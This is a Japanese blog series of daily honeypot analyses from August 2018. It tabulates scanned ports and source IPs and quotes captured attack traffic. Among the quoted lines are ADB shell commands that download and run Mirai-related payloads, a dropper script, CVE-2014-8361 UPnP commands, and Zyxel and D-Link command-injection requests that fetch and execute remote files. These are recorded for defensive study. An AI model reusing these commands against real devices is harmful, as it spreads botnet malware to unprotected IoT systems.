ハニーポット分析(7日目:8/14)
ハニーポットの分析7日目です。
そろそろログも1週分溜まったので、週末にまとめ的なものを作ろうとと思います。
Honeytrap 分析 8/14
検知数 9445 件
ペイロード有 4327件
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
445 | SMB | 1,600 | 36.98% | 調査行為 |
3389 | RDP | 1,134 | 26.21% | 調査行為 |
22022 | SSH | 201 | 4.65% | 調査行為 |
222 | SSH | 201 | 4.65% | 調査行為 |
22220 | SSH | 91 | 2.10% | 調査行為 |
81 | GoAhead Web Server | 62 | 1.43% | 調査行為 |
1433 | Microsoft SQL Server | 57 | 1.32% | 調査行為 |
8080 | PROXY | 52 | 1.20% | 調査行為 |
5555 | Android Debug Bridge (ADB) | 39 | 0.90% | マルウェアダウンロード |
6666 | ? | 39 | 0.90% | 調査行為 |
ポート:445
NETWORK PROGRAM 1.0LANMAN1.0Windows for Workgroups 3.1aLM1.2X002LANMAN2.1NT LM 0.12
ポート:3389
Cookie: mstshash=hello
ポート:22022, 222, 22220
SSH-2.0-libssh2_1.4.3
ポート:81
GET login.cgi HTTP/1.1
ポート:1433
SQL-32160.1x.14x.18xODBC
ポート:8080
GET / HTTP/1.1
ポート:5555
shell:cd /data/local/tmp;wget http[:]//207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget http[:]//207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp[:]//207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp[:]//207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;
→Mirai系のマルウェア
ポート:6666
Cookie: mstshash=hello
SMB PC NETWORK PROGRAM 1.0MICROSOFT NETWORKS 1.03MICROSOFT NETWORKS 3.0LANMAN1.0LM1.2X002SambaNT LANMAN 1.0NT LM 0.12
各ポートで検知数が多いペイロードを記載しています。調査行為がほとんどで、あとはIoTを狙ったものでした。
何か攻撃実行が容易な脆弱性が発見されれば、何か見つけることも出来そうですが、それまでは大きな変化はないかなーと思ってます。なので、気長に続いていこうと思います。
以上、分析結果でした。
ハニーポット分析(8/13:6日目)
ハニーポット分析 6日目になります。
WoWHoneypotの分析は時間の関係上、週末にまとめてやろうと考えてます。
▪️Honeytrap分析
検知数: 8864件
ペイロード有 5180件
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
81 | ? | 1,860 | 35.91% | 調査行為 |
445 | SMB | 1,503 | 29.02% | 調査行為 |
3389 | RDP | 175 | 3.38% | 調査行為 |
1433 | Microsoft SQL Server | 86 | 1.66% | 調査行為 |
52869 | D-Link, Realtek SDK | 67 | 1.29% | マルウェアダウンロード (CVE-2014-8361) |
8088 | Asterisk (PBX) Web Configuration utility | 44 | 0.85% | /conf へアクセスできるかの調査行為 |
8545 | JSON RPC | 41 | 0.79% | JSON RPC へアクセスできるかの調査行為 |
8080 | PROXY | 36 | 0.70% | 調査行為 |
137 | NetBIOS 名前解決 | 32 | 0.62% | 調査行為 |
3780 | ? | 32 | 0.62% |
調査行為 |
ポート81宛の通信が増加していました。
GET login.cgi HTTP/1.1
GET / HTTP/1.1
Authorization: Basic YWRtaW46MDA5OTg4
→admin:009988
以前の記事になりますが、IIJ社 Security Diary で同様の通信が紹介されていました。
https://sect.iij.ad.jp/d/2017/09/293589.html
GoAhead Web Server の脆弱性を狙って、Hajimeボットに感染させるものでした。現在も、IoTを狙った攻撃が活発であることから、検知数が増加したと推測してます。
検知数が少ないポートを見てみたところ、1000ポート宛への通信にHTTPリクエストが来ていました。
GET /recordings/ HTTP/1.1
User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3
GET /a2billing/admin/Public/PP_error.php?c=accessdenied HTTP/1.1
User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2
調査してみたところ、A2billing の脆弱性を狙った通信のようでした。
http://www.asterisk2billing.org/
SQL Injection の脆弱性が存在しますが、本通信はそもそも A2billing が存在するかの調査行為だと思われます。攻撃そのものを観測できないのは残念です。。。
今回の分析は以上となります。
ハニーポット分析(8/12:5日目)
Splunkにログをうまく取り込めず、泣きそうになりましたが、8/12の分析を書いていこうと思います。
今回も、ログの取り込み作業に時間がかかってしまったため、Honeytrapのみとなります。
Honeytrap分析
▪8/12 総検知数 5746 (内、データサイズ 0byte 以上 2549 件)
<宛先ポート別 TOP10>
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
445 | SMB | 1,233 | 48.75% | 調査行為 |
3389 | RDP | 148 | 5.85% | 調査行為 |
52869 | D-Link, Realtek SDK | 93 | 3.68% | マルウェアダウンロード (CVE-2014-8361) |
2455 | wago-io-system | 64 | 2.53% | 調査行為 |
1433 | Microsoft SQL Server | 60 | 2.37% | 調査行為 |
8545 | JSON RPC | 44 | 1.74% | JSON RPC へアクセスできるかの調査行為 |
22 | SSH | 40 | 1.58% | 調査行為 |
8088 | Asterisk (PBX) Web Configuration utility | 37 | 1.46% | /conf へアクセスできるかの調査行為 |
81 | ? | 36 | 1.42% | HTTPでアクセスできるかの調査行為 |
5555 | Android Debug Bridge (ADB) | 35 | 1.38% |
マルウェアダウンロード |
<宛先ポートごとのペイロード(抜粋)>
445ポート:
PC NETWORK PROGRAM 1.0LANMAN1.0Windows for Workgroups 3.1aLM1.2X002LANMAN2.1NT LM 0.12
3389ポート:
Cookie: mstshash=hello
52869 ポート:
CVE-2014-8361 の脆弱性を狙ったもの(Mirai関連のマルウェアをダウンロード)
・POST /picsdesc.xml
wget http[:]//212[.]237[.]32[.]xx/mips -O am
・POST /wanipcn.xml
wget http[:]//212[.]237[.]32[.]xx -O am
2455ポート:
SMBr@@PC NETWORK PROGRAM 1.0MICROSOFT NETWORKS 1.03MICROSOFT NETWORKS 3.0LANMAN1.0LM1.2X002SambaNT LANMAN 1.0NT LM 0.12
8545 ポート:
POST / HTTP/1.1
User-Agent: python-requests/2.13.0
Content-Type: application/json
{"params": [], "jsonrpc": "2.0", "method": "web3_clientVersion", "id": 67}
→JSON RPC が動作しているかの調査行為と思われます。
5555ポート:
shell:cd /data/local/tmp;wget http[:]//207[.]148[.]78[.]xxx/br -O- >br;sh br;busybox wget http[:]//207[.]148[.]78[.]xxx/r -O- >r;sh r;curl http[:]//207[.]148[.]78[.]xxx/c >c;sh c;busybox curl http[:]//207[.]148[.]78[.]xxx/bc >bc;sh bc;rm -rf bc br r c;"
→Mirai関連のマルウェアをダウンロード
<送信元IP別TOP10>
送信元IP | 国 | 検知数 | 割合 | 攻撃ポート |
222.108.143.xxx | Korea | 106 | 4.19% | 複数ポート |
80.211.67.xxx | Italy | 68 | 2.69% | 52869 |
45.33.92.xx | United States | 64 | 2.53% | 2455,9151 |
46.166.148.xxx | Netherlands | 42 | 1.66% | 8545 |
185.156.177.xx | Russian | 39 | 1.54% | 複数ポート |
185.143.223.xxx | Netherlands | 39 | 1.54% | 複数ポート |
103.79.142.x | Viet Nam | 37 | 1.46% | 複数ポート |
222.186.59.xxx | China | 37 | 1.46% | 複数ポート |
139.162.245.xx | United Kingdom | 33 | 1.31% | 23 |
198.74.62.xxx | United States | 32 | 1.27% | 143 |
昨日と比較して、JSON RPCの調査行為が増えたものの、傾向は前日とあまり変わっていませんでした。
明確に攻撃であると分かるものは、Mirai系のマルウェアのダウンロードであり、検知数の上位のほとんどが調査行為と思われる通信でした。
検知数上位は傾向が変わらないため、次回は検知数の少ないもの を調査しようと思います。
今回は簡易ですが、以上が 分析結果となります。
ハニーポット分析(4日目:2018/8/11)
ハニーポット分析 4日目です。
本日は、時間があまり取れないため、Honeytrapのみの分析となります。
1. Honeytrap 検知数 6528
<宛先ポート別 TOP10>
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
445 | SMB | 2,338 | 35.82% | 調査行為(SMB) |
23 | TELNET | 1,522 | 23.32% | 調査行為(ペイロードなし) |
5900 | VNC | 357 | 5.47% | 調査行為(ペイロードなし) |
9960 | ? | 226 | 3.46% | 調査行為(SSH) |
2323 | TELNET | 158 | 2.42% | 調査行為(ペイロードなし) |
3306 | MySQL | 113 | 1.73% | 調査行為(ペイロードなし) |
3389 | RDP | 85 | 1.30% | ログイン試行(Cookie: mstshash) |
52869 | D-Link, Realtek SDK | 83 | 1.27% | マルウェアダウンロード |
1433 | Microsoft SQL Server | 66 | 1.01% | 調査行為? |
5555 | Android Debug Bridge (ADB) ? | 54 | 0.83% | マルウェアダウンロード |
9960ポート:
SSHでアクセス出来るかの調査行為であり、脆弱性を狙った攻撃ではありませんでした。
<検知ペイロード>
SSH-2.0-libssh2_1.4.3
52869 ポート:
CVE-2014-8361 の脆弱性を狙ったものであり、前日同様にMirai関連のマルウェアでした(ファイルダウンロード先の変更なし)
<攻撃パケット>
POST /picsdesc.xml
wget http[:]//212[.]237[.]32[.]xx/mips -O am
POST /wanipcn.xml
wget http[:]//212[.]237[.]32[.]xx -O am
5555ポート:
検知したペイロードは以下であり、をダウンロードしようと試みるものでした。
①
shell:cd /data/local/tmp;wget http[:]//207[.]148[.]78[.]xxx/br -O- >br;sh br;busybox wget http[:]//207[.]148[.]78[.]xxx/r -O- >r;sh r;curl http[:]//207[.]148[.]78[.]xxx/c >c;sh c;busybox curl http[:]//207[.]148[.]78[.]xxx/bc >bc;sh bc;rm -rf bc br r c;"
→以下のファイルをダウンロード
#!/bin/sh
n="arm7 arm5 arm mips mpsl x86 x64 i686"
http_server="207[.]148[.]78[.]xxx"
cd /data/local/tmp
for i in $n
do
cp /system/bin/sh z
>z
wget http://$http_server/qtx.$i -O- > z
chmod 777 z
./z $i
done
→通信先をVirusTotalで調査したところ、Mirai関連のマルウェアでした。
②
shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget http[:]//185[.]162[.]130[.]xxx/adbs -O -> adbs; sh adbs; curl http[:]//185[.]162[.]130[.]xxx/adbs2 > adbs2; sh adbs2; rm adbs adbs2
→該当のURLへのアクセス不可
断定は出来ないですが、おそらくMirai関連だと思います。
<送信元IP別 TOP10>
送信元IP | 国 | 検知数 | 割合 | 攻撃ポート |
185.209.0.XX | Latvia | 278 | 4.26% | 複数ポート |
46.218.35.xx |
France |
226 | 3.46% | 9960 |
60.56.207.xx | Japan | 207 | 3.17% | 23 |
59.14.195.xx | Korea | 203 | 3.11% | 5900,5901,5902,5903,5904,5907,5909 |
185.56.81.xx | Seychelles | 191 | 2.93% | 5900 |
185.209.0.xy | Latvia | 119 | 1.82% | 複数ポート |
185.156.177.xxx | Russian | 104 | 1.59% | 複数ポート |
211.105.119.xxx | Korea | 102 | 1.56% | 5900 |
219.91.138.xxx | India | 83 | 1.27% | 23 |
154.8.218.xx | China | 61 | 0.93% | 3306 |
IoT製品を狙った攻撃はIPを分散させる傾向にあるため、TOP10にはランクインするケースは少ないように感じます。
攻撃ポートが複数ポートと書いてあるものはポートスキャンとなっています。
ペイロードサイズが 0byteのものはあまり見ても面白くないので、次回以降は除外しようと思います。
以上、4日目の分析でした。
ハニーポット分析(3日目:2018/8/10)
3日目である 2018/8/10 のハニーポット分析です。
今回、WoWHoneypotのログも分析しようと思いましたが、誤ってデリートしてしまいました。。。。よって、今回は Honeytrapのみの分析となります。
1.Honeytrap
検知数:8,503 件
<宛先ポートごとの検知数 TOP10>
ポート | 件数 | 割合 | サービス |
445 | 2,619 | 33.86% | SMB |
23 | 1,452 | 18.77% | TELNET |
3306 | 478 | 6.18% | MySQL |
5900 | 346 | 4.47% | VNC |
2323 | 165 | 2.13% | TELNET |
52869 | 84 | 1.09% | D-Link, Realtek SDK |
1433 | 65 | 0.84% | Microsoft SQL Server |
20000 | 63 | 0.81% |
? |
3389 | 54 | 0.70% | RDP |
8080 | 54 | 0.70% | PROXY |
今回は宛先ポート番号は 20000 が増加していました。ポート番号 20000について、調べて見たのですが、サービスを断定することが出来ませんでした。検知内容は HEX形式でエンコードされているため、いくつかデコードして見ました。
・^0\ P¢NM£0 ¡0krbtgtNM¥19700101000000Z§¹Ù¨0
・¤ÿSMBr@@PC NETWORK PROGRAM 1.0MICROSOFT NETWORKS 1.03MICROSOFT NETWORKS 3.0LANMAN1.0LM1.2X002SambaNT LANMAN 1.0NT LM 0.12
読める文字列から推測すると KerberosおよびSMBに関する通信を思われます。何かの脆弱性を狙った可能性もありますが、調査までは出来ていません。他の検知については、1日目および2日目と大きく変わっている通信はありませんでした。
<送信元IPごとにおける検知数 TOP10>
送信元IP | ブラックリスト | 検知数 | 割合 |
185.209.0.xx | × | 430 | 11.93% |
185.209.0.xy | × | 363 | 10.07% |
185.156.177.xxx | × | 71 | 1.97% |
80.211.67.xxx | ○ | 56 | 1.55% |
46.166.148.xxx | × | 36 | 1.00% |
176.58.97.xxx | × | 34 | 0.94% |
139.162.183.xx | ○ | 33 | 0.92% |
50.116.56.xxx | ○ | 33 | 0.92% |
66.228.48.xx | × | 33 | 0.92% |
172.104.240.xx | × | 32 | 0.89% |
今回、送信元IPごとの傾向を調べて見ました。ブラックリストは Cisco Talos および X-Force を利用して調査しました。
検知数の多い185.209.0.xx , 185.209.0.xy は様々なハイポートに対してアクセスしているため、ポートスキャンを行なっていると思われます。
ブラックリストへ登録されている送信元IPの通信内容については以下となります。
▪️ 80.211.67.xxx
CVE-2014-8361 の脆弱性を狙ったものであり、リクエスト内容は以下となります。
POST /picsdesc.xml HTTP/1.1
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
User-Agent: python-requests/2.4.3 CPython/2.7.9 Linux/3.16.0-5-amd64
POST /wanipcn.xml HTTP/1.1
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
User-Agent: python-requests/2.4.3 CPython/2.7.9 Linux/3.16.0-5-amd64
実際に検知したコマンド部分を確認したところ、ダウンロードしてくるマルウェアは Mirai関連でした(VirusTotalで確認)
・cd /tmp/;wget http[:]//212[.]237[.]32[.]62/mips -O am
・cd /tmp/;chmod +x am;./am mips
▪️139.162.183.xx , 50.116.56.xxx
検知内容は SMBや Kerberosと推測される通信を検知していました。おそらく、ツールで調査しているものであり、分類はスキャンにカテゴライズかと思います。
今回の分析は以上となります。
ハニーポット分析(2日目:2018/8/9)
ハニーポット分析(2日目:2018/8/9)を書いていきたいと思います。
今回からログをSplunkに取り込んでいるのですが、ログを自動的に正規化してくれるので分析が捗ります。まだまだ、使えてない機能も沢山あると思うので、勉強して分析しやすい環境を作って入ればと思います。
▪️分析結果
1. Honeytrap
検知数:6,950 件
宛先ポート別集計(TOP10)
ポート | サービス | 検知数 |
445 | SMB | 2640 |
23 | TELNET | 1241 |
6969 | Trojan | 227 |
5900 | VNC | 179 |
502 | OpenBlocks IoT Family | 171 |
2323 | TELNET | 109 |
52869 | D-Link, Realtek SDK | 84 |
3306 | MySQL | 78 |
1433 | Microsoft SQL Server | 70 |
3389 | RDP | 50 |
5038 | PBXソフトウェア「Asterisk」 | 50 |
<VNCおよびRDPの通信>
前日の集計と比較して、VNCおよびRDPへの通信が増加していました。
VNCへの通信はペイロードサイズが 0Byteであったため、調査行為と思われます。
RDPでログインする際、Cookie: mstshash=ユーザー名 を利用する仕様らしいため 、よく利用されているユーザー名でログインできないか試している調査段階であると思われます[1][2]。
流石にユーザ名 hello でログインできるとは思いませんが。。。。。
<ポート 6969 >
ポート 6969 はトロイの木馬で利用されるケースが多いとの記事[3]もあり、 検知内容もSSHでログイン可能であるかの通信であったので、 バックドアが動作しているかの調査行為と思われます。
<OpenBlocks IoT Family>
ポート 502 を検索してみると IoTを狙った攻撃であるという記事が多かったため、何かの製品で利用されているか調べて見たところ、OpenBlocks IoT Family という製品が見つかりました[4]。
ただし、D-Linkなどのwget でマルウェアをダウンロードしてくる通信ではなく、/ : ; < = ? J K L など1文字をひたすら送信してくるものであり、攻撃と断定できる通信はありませんでした。
こうして見ると、Honeyportは調査止まりの通信が多いと感じます。
やはり、WoWHoneypotのようにあえて脆弱性なレスポンスを返すような工夫が必要かもしれません。。。。
2. WoWHoneypot
検知数: 204件
宛先パス別集計(TOP10)
パス | 検知数 |
/ | 39 |
/qq.php | 4 |
/phpMyAdmin/phpMyAdmin/index.php | 3 |
/admin/phpMyAdmin/index.php | 3 |
/phpMyAdmin/index.php | 3 |
/cmd.php | 3 |
/claroline/phpMyAdmin/index.php | 2 |
/tools/phpMyAdmin/index.php | 2 |
/www/phpMyAdmin/index.php | 2 |
/admin/PMA/index.php | 2 |
他のログを確認しましたが、PHPMyAdminを狙ったもの、IoTを狙った通信など
目新しいものはありませんでした。
/qq.php および/cmd.php はPOSTでBODY部にコマンドが書いてありましたが、
特に気にするようなコマンドではありませんでした。
<コマンド内容>
cmd=die(md5('PHP'));
本日分は以上となります。
参考サイト:
[1]https://blogs.technet.microsoft.com/junichia/2011/03/24/azure-for-it-proazure-vm-rdp/
[2]http://d.hatena.ne.jp/naablaa/20061217/p1 [3]https://scan.netsecurity.ne.jp/article/2002/08/29/6438.html
[4]https://openblocks.plathome.co.jp/products/obs_iot/common/pdf/OpenBlocks_iot_Handler_Data_Format_v3.1.0_20180420.pdf
ハニーポット分析(1日目:2018/8/8)
現在、 WoWhoneypotやHoneytrapを運用していますが、アウトプットする
機会がなかったため、ブログで色々と情報発信出来ればと思い、
始めて見ました。
WoWhoneypotやHoneytrapなどの低対話型のハニーポットについては以前に資料を
作成しましたので、そちらを見てもらえればと思います。
Honeytrapの検知数が多く、まだ解析用の基盤が準備できていないので、
各ポートのペイロード分析やアクセス先のパス情報などは
後々やっていこうと考えています。
それまでは個人的に気になった点を書いていきます。
8/8 (水) の分析結果
1.Honeytrapで検知した攻撃
合計で 7078 件の検知がありましたが、ここでは件数が多かった
上位10件をピックアップします。
ポート番号 | 件数 | サービス |
445 | 2963 | SMB |
23 | 1067 | TELNET |
5038 | 1018 | PBXソフトウェア「Asterisk」 |
52869 | 160 | D-Link, Realtek SDK |
503 | 142 | intrinsa |
22 | 95 | SSH |
3306 | 87 | MySQL |
1433 | 83 | Microsoft SQL Server |
44818 | 65 | Ethernet/IP(Ethernet Industrial Protocol) |
2020 | 64 | SSH |
SMBやTELNET、SSH、などの狙われやすいポート以外に、D-LinkやAsteriskの
ポートへのアクセスが多かったです。
5038 ポートへのアクセスはデータサイズが 0byteであったため、
調査行為の通信と思われます。
ポート 52869 への通信は CVE-2014-8361 の脆弱性を狙ったもので
/picsdesc.xml へのPOST メソッドおよび wget コマンドで以下の
ファイルをダウンロードします。
wget http[:]//192[.]184[.]93[.]244/salvia[.]mips
→ IoT製品を狙ったmirai系のマルウェアと推測
2.WoWhoneypotで検知した攻撃
36件のアクセス内、D-linkの脆弱性とZyxel製ルータの脆弱性を観測しました。
Zyxel製ルータの脆弱性
GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca ; cd /tmp;wget http[:]//178[.]128[.]11[.]199/rvs -O /tmp/rz;chmod 777 /tmp/rz;sh /tmp/rz HTTP/1.0
→VirusTotal
D-linkの脆弱性
GET /login.cgi?cli=aa aa';wget http[:]//185[.]172[.]164[.]41/e -O -> /tmp/hk;sh /tmp/hk'$ HTTP/1.1s
→VirusTotal
いずれもアクセス自体はすで出来ませんでしたが、恐れく IoT製品を狙った
mirai系のマルウェアと思われます。
なるべく、更新できるように頑張っていきます。